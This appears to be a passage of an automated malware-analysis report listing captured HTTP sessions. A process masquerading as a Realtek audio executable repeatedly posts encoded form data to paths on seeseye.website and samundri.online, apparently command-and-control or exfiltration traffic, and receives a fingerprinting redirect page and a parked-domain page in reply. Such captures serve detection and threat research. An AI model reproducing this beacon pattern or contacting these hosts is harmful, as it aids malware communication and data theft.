                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 08 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 2b f2 ef a3 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 98 8b 63 38 ca bd 72 ba 27 a0 7d 8f 45 4c 78 4f e2 56 6e e5 31 1a 83 77 aa 88 c5 ad 17 b5 36 6b 74 bd d3 86 84 d6 35 66 9d 36 d9 ad 8f cb 5c 1c b1 af a5 2a a3 ad 74 e0 b0 d2 0e 15 fd 6a b5 b9 83 02 92 86 a8 5f 08 b1 db ed b2 17 12 05 ae fe 5c 89 8f c9 32 8a 84 80 1b 24 90 40 ba 43 bb 21 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 1e d5 86 90 81 8f 75 40 d7 40 0d c2 33 f9 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 18 45 da 1a 3e 6e db 95 54 77 d7 63 aa 74 0a 0f d1 64 a7 4d 65 77 59 6b 95 0c a8 cc 61 df 4a 85 e9 3f c6 ce 93 ba 2f 2e 3e 24 d3 65 74 88 22 72 fb c0 64 95 9e c0 55 ee c7 68 a2 00 8f 34 6e d2 97 d5 de 05 83 cc 9f 84 ae d5 fd f7 51 73 01 9f 9f 9c 7c bd 61 1d b2 4a 1f 3a 6b 34 59 0e ad 17 41 b6 c7 43 60 [TRUNCATED]
                                                                                                  Data Ascii: Tn0=_A;jnAX-y4+7C-==rPQAZ,==f;\yMc8r'}ELxOVn1w6kt5f6\*tj_\2$@C!5g3r@u@@3;i1[umLE>nTwctdMewYkaJ?/.>$et"rdUh4nQs|aJ:k4YAC`XdqLZP-[#2q7-:b_S-GKmeB}&E>;(VhS-.gj~`bx-jlk]!-og+[$~c.288<)?ZAi5.Rss"2&"bb[5=eC//k0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  47192.168.11.3049912103.224.182.242805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:37.406683922 CET1289OUTPOST /ebz6/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.seeseye.website
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.seeseye.website
                                                                                                  Referer: http://www.seeseye.website/ebz6/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 76 70 72 46 54 35 65 57 34 34 69 2b 54 6c 69 51 6c 35 4c 41 39 71 31 6d 68 6d 71 51 71 50 62 47 54 4f 54 73 71 58 58 54 48 45 59 50 6e 53 70 59 2b 58 62 31 30 2b 2b 78 72 70 36 34 62 30 6c 4b 35 41 6c 79 2f 5a 33 51 45 7a 53 73 34 47 70 43 54 52 5a 44 61 59 72 4c 73 57 73 4f 43 34 53 6c 6d 35 62 38 47 73 74 73 79 71 6a 6e 46 55 43 4b 6a 4f 57 2f 44 74 52 55 72 31 4e 59 66 57 50 51 58 66 37 61 76 70 38 70 5a 36 75 46 64 76 48 65 45 33 73 41 6c 66 5a 76 74 39 4d 4b 52 72 48 34 73 72 6a 31 5a 79 58 76 32 41 71 4a 59 32 69 6d 79 77 2f 63 75 63 5a 4c 50 63 2f 61 76 68 63 68 71 31 53 37 59 45 55 76 4d 69 51 39 5a 38 72 45 71 34 6c 55 59 43 5a 63 6a 63 37 71 66 52 74 6f 48 6b 38 75 36 74 62 31 5a 6c 76 55 63 42 46 70 56 69 45 65 71 42 75 73 6d 6c 33 74 68 69 6f 43 2b 39 47 4e 55 33 71 56 58 6d 42 78 44 73 2f 32 4b 50 59 34 43 68 7a 70 2b 6d 47 30 72 4d 54 67 63 48 38 76 62 4d 43 5a 63 41 34 63 72 62 77 70 51 67 32 41 75 62 76 6f 53 75 4a 67 78 2b 4a 69 2f 55 59 54 4c 71 41 76 37 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=ovprFT5eW44i+TliQl5LA9q1mhmqQqPbGTOTsqXXTHEYPnSpY+Xb10++xrp64b0lK5Aly/Z3QEzSs4GpCTRZDaYrLsWsOC4Slm5b8GstsyqjnFUCKjOW/DtRUr1NYfWPQXf7avp8pZ6uFdvHeE3sAlfZvt9MKRrH4srj1ZyXv2AqJY2imyw/cucZLPc/avhchq1S7YEUvMiQ9Z8rEq4lUYCZcjc7qfRtoHk8u6tb1ZlvUcBFpViEeqBusml3thioC+9GNU3qVXmBxDs/2KPY4Chzp+mG0rMTgcH8vbMCZcA4crbwpQg2AubvoSuJgx+Ji/UYTLqAv7lQkfAZn14fcrJlQ6wYHRdEcTUJxhpaDL8NfcRoUBQXWg5rLwzyztsFkICohYNaPwEtVN5F9P9sdSWONnsvOEoZdYfY54KQt6Umolh3rbGXiwXzdUegsoVkPtLIzbL3l6IPbnScNhz7/Hsmfy7n6gv15sTq83yhJcHakVqxnN51SyLP90FTWQF9ogQR32p0Zz2/Bi1R0s2tKA0TKgi0upRgP5NxaMyyV5Uhpa03qJHskhIRO97yvmRGvkW2WyvMMBQTesl7xI20nH2N5cNfRD3+r2i/V9OZXP7fmxSB38DH74K0U9uhJJzYQOBAK/hYZ/8g1w1tA3hyTcyxG+hO2lyivQBOLrhw6MMPBpjN3L1knLrBQYQ4M5QXCHDLlo2jqh7FgFmpiMYjxlzVSRa2h6pIQRczlhSnUouE6jKHIBgR9QnQHjalFfZw3osxUYjx0IOzxLgm0Ql43PMvVzk0F1d0Xfk
                                                                                                  Dec 3, 2024 09:50:37.406744957 CET2529OUTData Raw: 6b 6a 56 72 39 35 6d 2f 68 46 61 72 73 36 73 6e 4e 39 50 6b 30 48 54 46 44 47 71 53 37 2f 73 5a 47 73 71 36 51 30 62 57 68 2f 58 52 39 36 42 70 5a 50 71 63 50 2f 2f 56 75 5a 4a 59 42 72 43 74 57 54 38 36 59 45 51 39 49 56 59 48 79 68 77 38 33 72
                                                                                                  Data Ascii: kjVr95m/hFars6snN9Pk0HTFDGqS7/sZGsq6Q0bWh/XR96BpZPqcP//VuZJYBrCtWT86YEQ9IVYHyhw83r7SB77spyvIC6J44p5rcJojhKu8APgNRqH/MoFQp96bX68PG/p+G1SHR1UOzzPox/qfMOmdRth2fU3x55Xve76L9hSWHV54aYytvCoiw6ZVevt62WEJPyOZRJAgqZGRSnUSFnM8unRsm4lqoSYOmJ0bLk1arrDqNPV
                                                                                                  Dec 3, 2024 09:50:37.585685015 CET874INHTTP/1.1 200 OK
                                                                                                  date: Tue, 03 Dec 2024 08:50:37 GMT
                                                                                                  server: Apache
                                                                                                  set-cookie: __tad=1733215837.7810391; expires=Fri, 01-Dec-2034 08:50:37 GMT; Max-Age=315360000
                                                                                                  vary: Accept-Encoding
                                                                                                  content-encoding: gzip
                                                                                                  content-length: 579
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  connection: close
                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 08 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 2b f2 ef a3 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 98 8b 63 38 ca bd 72 ba 27 a0 7d 8f 45 4c 78 4f e2 56 6e e5 31 1a 83 77 aa 88 c5 ad 17 b5 36 6b 74 bd d3 86 84 d6 35 66 9d 36 d9 ad 8f cb 5c 1c b1 af a5 2a a3 ad 74 e0 b0 d2 0e 15 fd 6a b5 b9 83 02 92 86 a8 5f 08 b1 db ed b2 17 12 05 ae fe 5c 89 8f c9 32 8a 84 80 1b 24 90 40 ba 43 bb 21 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 1e d5 86 90 81 8f 75 40 d7 40 0d c2 33 f9 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 18 45 da 1a 3e 6e db 95 54 77 d7 63 aa 74 0a 0f d1 64 a7 4d 65 77 59 6b 95 0c a8 cc 61 df 4a 85 e9 3f c6 ce 93 ba 2f 2e 3e 24 d3 65 74 88 22 72 fb c0 64 95 9e c0 55 ee c7 68 a2 00 8f 34 6e d2 97 d5 de 05 83 cc 9f 84 ae d5 fd f7 51 73 01 9f 9f 9c 7c bd 61 1d b2 4a 1f 3a 6b 34 59 0e ad 17 41 b6 c7 43 60 [TRUNCATED]
                                                                                                  Data Ascii: Tn0=_A;jnAX-y4+7C-==rPQAZ,==f;\yMc8r'}ELxOVn1w6kt5f6\*tj_\2$@C!5g3r@u@@3;i1[umLE>nTwctdMewYkaJ?/.>$et"rdUh4nQs|aJ:k4YAC`XdqLZP-[#2q7-:b_S-GKmeB}&E>;(VhS-.gj~`bx-jlk]!-og+[$~c.288<)?ZAi5.Rss"2&"bb[5=eC//k0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  48192.168.11.3049913103.224.182.242805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:40.107511997 CET416OUTGET /ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA+H3rtA/rIZAdo0g/oDUTfbsJ2pfg1bAoxQTquSVCJvkgdI11EDq3zwrg4WM3Dp4Vk=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.seeseye.website
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:50:40.292598963 CET1289INHTTP/1.1 200 OK
                                                                                                  date: Tue, 03 Dec 2024 08:50:40 GMT
                                                                                                  server: Apache
                                                                                                  set-cookie: __tad=1733215840.8340372; expires=Fri, 01-Dec-2034 08:50:40 GMT; Max-Age=315360000
                                                                                                  vary: Accept-Encoding
                                                                                                  content-length: 1525
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 73 65 65 73 65 79 65 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 65 73 65 79 65 2e 77 65 62 73 69 74 65 2f 65 62 7a 36 2f 3f 36 61 6f 6e 6c 35 78 3d 6c 74 42 4c 47 6e 30 45 66 71 38 39 79 77 64 78 61 7a 46 6e 43 2f 69 4b 30 58 36 61 51 59 58 6a 65 47 4b 48 75 50 72 49 63 77 38 54 61 46 65 77 61 35 48 4c 7a 41 2b 48 33 72 74 41 2f 72 49 5a 41 64 6f 30 67 2f 6f 44 55 54 66 62 73 4a 32 70 66 67 31 62 41 6f 78 51 54 71 75 53 56 43 4a 76 6b 67 64 49 31 31 45 44 71 33 7a 77 72 67 34 57 4d 33 44 70 34 56 6b 3d 26 77 59 48 [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>seeseye.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.seeseye.website/ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA+H3rtA/rIZAdo0g/oDUTfbsJ2pfg1bAoxQTquSVCJvkgdI11EDq3zwrg4WM3Dp4Vk=&wYHk=M_B-ghc2HqoWhmeC&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='disp [TRUNCATED]
                                                                                                  Dec 3, 2024 09:50:40.292608976 CET508INData Raw: 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 65 73 65 79 65 2e 77 65 62 73 69 74 65 2f 65 62 7a 36 2f 3f 36 61 6f 6e 6c 35 78 3d 6c 74 42 4c 47 6e 30 45 66 71 38 39 79 77 64 78 61 7a 46 6e 43 2f 69 4b 30
                                                                                                  Data Ascii: none;'><a href='http://www.seeseye.website/ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA+H3rtA/rIZAdo0g/oDUTfbsJ2pfg1bAoxQTquSVCJvkgdI11EDq3zwrg4WM3Dp4Vk=&wYHk=M_B-ghc2HqoWhmeC&fp=-3'>Click here to enter</a></div><noscr


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  49192.168.11.304991484.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:45.666235924 CET681OUTPOST /hz0b/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.samundri.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.samundri.online
                                                                                                  Referer: http://www.samundri.online/hz0b/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 45 54 6d 4d 6f 50 72 6d 37 76 69 64 46 34 45 77 64 56 6e 54 43 42 43 45 39 6b 70 73 47 34 63 50 56 38 4b 76 39 4b 41 33 52 75 67 61 6b 75 4d 48 70 38 57 31 52 51 44 45 37 31 61 66 72 52 6d 6c 6c 57 4e 75 49 70 35 47 56 4f 77 48 39 32 6e 6a 55 4c 47 39 76 76 58 69 59 32 6a 59 39 51 6b 63 5a 71 51 61 67 71 70 51 6d 38 6a 79 76 41 75 2f 46 6d 75 50 4e 2f 5a 57 77 32 70 44 37 62 68 6c 72 32 46 6c 6a 54 78 30 75 73 4e 4b 76 6b 33 39 58 31 70 43 6f 76 53 54 4c 6f 4e 6a 33 6f 35 55 44 4d 62 41 34 4f 77 66 37 68 66 54 51 65 6f 46 30 2b 76 72 38 47 33 71 50 36 6f 48 44 4e 43 4b 7a 77 3d 3d
                                                                                                  Data Ascii: 6aonl5x=ETmMoPrm7vidF4EwdVnTCBCE9kpsG4cPV8Kv9KA3RugakuMHp8W1RQDE71afrRmllWNuIp5GVOwH92njULG9vvXiY2jY9QkcZqQagqpQm8jyvAu/FmuPN/ZWw2pD7bhlr2FljTx0usNKvk39X1pCovSTLoNj3o5UDMbA4Owf7hfTQeoF0+vr8G3qP6oHDNCKzw==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  50192.168.11.304991584.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:48.418225050 CET701OUTPOST /hz0b/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.samundri.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.samundri.online
                                                                                                  Referer: http://www.samundri.online/hz0b/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 45 54 6d 4d 6f 50 72 6d 37 76 69 64 45 64 55 77 4f 69 54 54 4b 42 43 46 34 6b 70 73 4d 59 63 44 56 38 32 76 39 49 77 6e 52 63 45 61 6b 50 38 48 6e 65 2b 31 57 51 44 45 77 56 61 67 76 52 6d 2b 6c 57 4a 51 49 73 35 47 56 50 55 48 39 30 2f 6a 54 34 65 2b 2b 76 58 6b 58 57 6a 61 7a 77 6b 63 5a 71 51 61 67 71 73 2f 6d 38 37 79 76 31 2b 2f 45 45 4b 49 4c 50 5a 52 67 47 70 44 2f 62 68 68 72 32 46 48 6a 53 73 62 75 71 52 4b 76 68 4c 39 55 6e 42 46 69 76 53 52 45 49 4d 4f 77 39 49 48 4f 2f 50 49 37 76 30 30 33 78 58 32 52 4a 46 66 70 39 62 70 76 6d 4c 48 54 37 46 76 42 50 44 52 75 2b 61 46 49 35 33 4b 76 47 46 76 30 54 77 6a 31 41 71 59 48 79 6f 3d
                                                                                                  Data Ascii: 6aonl5x=ETmMoPrm7vidEdUwOiTTKBCF4kpsMYcDV82v9IwnRcEakP8Hne+1WQDEwVagvRm+lWJQIs5GVPUH90/jT4e++vXkXWjazwkcZqQagqs/m87yv1+/EEKILPZRgGpD/bhhr2FHjSsbuqRKvhL9UnBFivSREIMOw9IHO/PI7v003xX2RJFfp9bpvmLHT7FvBPDRu+aFI53KvGFv0Twj1AqYHyo=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  51192.168.11.304991684.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:51.178272963 CET2578OUTPOST /hz0b/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.samundri.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.samundri.online
                                                                                                  Referer: http://www.samundri.online/hz0b/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 45 54 6d 4d 6f 50 72 6d 37 76 69 64 45 64 55 77 4f 69 54 54 4b 42 43 46 34 6b 70 73 4d 59 63 44 56 38 32 76 39 49 77 6e 52 63 4d 61 6b 64 45 48 6e 35 4b 31 58 51 44 45 39 31 61 62 76 52 6d 2f 6c 57 78 4d 49 73 38 37 56 4e 63 48 38 52 6a 6a 53 4a 65 2b 6e 2f 58 6b 63 32 6a 62 39 51 6b 7a 5a 71 67 65 67 70 45 2f 6d 38 37 79 76 30 4f 2f 44 57 75 49 4a 50 5a 57 77 32 70 78 37 62 67 45 72 79 70 39 6a 53 35 6b 75 73 46 4b 76 57 50 39 58 55 70 46 69 76 53 52 49 6f 4d 50 77 39 4d 43 4f 2f 58 63 37 74 59 43 32 43 62 32 53 63 68 43 36 74 76 72 74 51 66 51 52 37 4e 62 48 73 62 32 78 65 43 58 5a 59 37 6f 6f 30 30 4f 71 7a 70 35 6b 41 76 66 47 6d 49 35 4c 6b 70 46 79 43 79 67 51 4f 30 57 55 41 75 79 33 68 68 55 7a 31 56 78 58 73 6d 75 78 6b 54 31 42 56 52 52 42 44 72 57 4f 6a 79 6c 71 33 34 64 55 55 63 74 52 4f 64 52 70 6b 75 45 53 75 35 65 78 34 61 77 64 71 52 2b 30 7a 57 79 4f 6f 48 41 5a 4e 44 48 58 53 59 67 6e 62 68 39 59 6a 31 6d 53 64 4d 50 79 42 43 6d 39 56 47 57 57 53 2b 4d 6a 78 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=ETmMoPrm7vidEdUwOiTTKBCF4kpsMYcDV82v9IwnRcMakdEHn5K1XQDE91abvRm/lWxMIs87VNcH8RjjSJe+n/Xkc2jb9QkzZqgegpE/m87yv0O/DWuIJPZWw2px7bgEryp9jS5kusFKvWP9XUpFivSRIoMPw9MCO/Xc7tYC2Cb2SchC6tvrtQfQR7NbHsb2xeCXZY7oo00Oqzp5kAvfGmI5LkpFyCygQO0WUAuy3hhUz1VxXsmuxkT1BVRRBDrWOjylq34dUUctROdRpkuESu5ex4awdqR+0zWyOoHAZNDHXSYgnbh9Yj1mSdMPyBCm9VGWWS+MjxyC3vn+2boxAlWpuMZ9obaMJJSM42Q+0d3S5uM9ahTx45HXgdJzFbb0CKNvN/eC/AS79OcSLXZjY8F9ROFJcsqQXeSJEupGHd4+hWt9YUauSP7efP0CPjvaLEqjEJS9kze1w6Bp2Wrxp94M2xIrcQKEerJ/nc7Sfv2pu0w3NvXs/yeYuexPjoCZdOGsDIxLa8kkrJoqauIWFSCYEJcIMtdTdxCUKjIyWqkKvZeL6iTSjdlAkOg2YjDhxEr1p8Hwju8bKyoik6rllobo8io86TUeF66Y+CL63S/W9l8DW09QBHujALDHlo+WaJX0Cc1a0TsGHCIbIufeR3/GfBhIFNQ5Y2S/FHjvcYnsOvG90NpCWqZHLOdHFomSp8sO5KSMmIpHmBRj8qRig3q4SRvKqCG7neT3VT5+oIgG9hkq+aIvSLBr1IW1pBKgjTgRlrdd3D/yuUnTySrBqO9RLsiHvrZ1VURrFHnnRK5M+xsed0TDn/bu4WAE0RS3Y3XPliPuhUGXX28Nn/YMfa3hXocmZ7VyJlKqAVNdG80jCT4EpdQgXQ3jaRUMIG4XxkpKP0LmmQwqOM/NEN3VWIm8HzGh5x4pldmXYstDn+eKaGhhBxK7esPC6GUfQV4y0gTbZIcEHP1rQ2ghifcTFI3GQlXLU3Y/wNCyh8LP1WD/ [TRUNCATED]
                                                                                                  Dec 3, 2024 09:50:51.178325891 CET1240OUTData Raw: 35 34 2f 77 6c 59 55 71 33 7a 76 4c 54 47 62 54 31 64 72 34 32 41 44 6d 42 6e 45 7a 49 65 30 77 45 75 44 48 67 6c 46 63 6b 69 70 66 66 5a 6e 4d 69 39 55 38 6f 78 52 38 5a 55 47 59 41 54 69 68 66 43 6c 56 47 48 71 58 68 41 6a 43 45 49 36 43 69 63
                                                                                                  Data Ascii: 54/wlYUq3zvLTGbT1dr42ADmBnEzIe0wEuDHglFckipffZnMi9U8oxR8ZUGYATihfClVGHqXhAjCEI6CicZyNAoxmHy7/qxxvcA9+/TGC676d38tFb79sWNVVbheHgW7AUrNPYR7MKi7NH4HIBXX19D+yuiliPv2eKiA52RAVs56D+sTKoxHNnaRORJYvyqAAQQEOm0mrXcxXAe/XO0B53mMlq/YNeKyvYbJd4S7DO5X3h2MaCQ


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  52192.168.11.304991784.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:53.914057016 CET416OUTGET /hz0b/?6aonl5x=JROsr6XP0vanBqI2CkbfACfn4SREJ4FMNJe05cc7We4KkOx2vOGxfRrWwD+RlhqEl2hqIbM9QtMk4VzKe4CXg9WRehnE4hJqVKIjnZFs25X2kR+IF22FPb4=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.samundri.online
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:50:54.125713110 CET1289INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 03 Dec 2024 08:50:54 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 9973
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Server: hcdn
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  x-hcdn-request-id: 148c9ec3b343ce9898c5f0f6b8640747-asc-edge4
                                                                                                  Expires: Tue, 03 Dec 2024 08:50:53 GMT
                                                                                                  Cache-Control: no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                  Dec 3, 2024 09:50:54.125828028 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                  Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
